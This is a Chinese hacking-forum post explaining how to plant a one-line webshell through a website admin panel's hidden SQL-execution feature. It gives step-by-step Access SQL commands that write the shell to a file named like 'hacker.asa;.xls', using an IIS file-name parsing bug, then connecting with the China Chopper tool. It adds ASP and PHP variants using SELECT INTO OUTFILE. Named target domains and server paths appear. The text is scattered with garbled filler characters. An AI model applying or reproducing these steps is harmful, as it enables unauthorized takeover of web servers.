中国网络渗透测试联盟

标题: ACCESS执行SQL命令导出一句话SHELL [打印本页]
作者: admin    时间: 2012-9-13 17:53
标题: ACCESS执行SQL命令导出一句话SHELL
好不容易进了后台,发现啥上传啊。备份啊多木有。
. B8 ?, o* u' p( lwebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的7 @. ?% \0 H6 ~3 H* P6 m
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
+ P& \4 M4 v# @# S+ t3 l" |8 s: E然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:1 q8 q3 n1 j4 M4 o5 d& e
1.create table cmd (a varchar(50))- }$ ?: c# }" _. e9 ^8 O3 T
2.insert into cmd (a) values (‘‘)
. `3 T# X) f/ o; I! ~% a# X3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd0 N1 c- ~) |3 w" }+ @" E% x7 T9 R
(把表cmd的内容导出为物理路径的一个EXCEL文件)/ W  U% c( @4 l% d! O! \- ^! h
4.drop table cmd
8 T9 g: n  ?. S8 ~& k2 K利用IIS的BUG成功拿到了WEBSHELL。
! u+ H# A$ {$ F6 z! {% I" Q* ?% n9 y1 u$ h6 K
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
: |5 {" B" P( E3 j7 t
2 J) v, b  l+ V: n- i! n  SQL语句意思解释:
4 O2 l9 z. W5 S6 @& q) p6 L" L) S  第一句
* n* |* S2 u& _7 _- L4 r- E  建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50, R" r- J; c* @9 w" ?

0 f& p4 I% q0 L: n6 \' ?% D  第二句
$ @% }3 ^# V8 Q  在表cmd的a字段插入一句话木马
/ b6 d/ O5 m; O  第三句3 ?) `- }1 G- E) E" g$ G( q6 p
  把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
, B' h3 J3 T) F5 F, \+ U9 h6 k: R- W: R* [! I4 f
  第四句
- M5 @6 H$ T6 |! R' q  删除建立的cmd表: d: ?% A. w' V) i6 ?8 j- p
5 `# \% H3 }5 E* p3 `! j/ n: N7 G1 _& S
  以下内容为测试:
: ?/ b5 K3 |) n  o  Access利用后台SQL执行命令功能导出WebShell:
+ x$ d- K  U$ [3 A  这个更简单:
$ @. l( n6 O; K, S  [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
. ?# m$ Q$ b! `3 z  或者2 k) a  P. g" w4 v" w
  [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]' ^) D' O4 _! _/ A% F& ?
0 B3 `+ A) T9 {, L
  后台有执行SQL语句功能(vote为已知表段)+ |* @0 H( t& C. s
  希望对大家有所帮助拿shell的又一个思路
: ^  o# U0 `/ X2 w



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2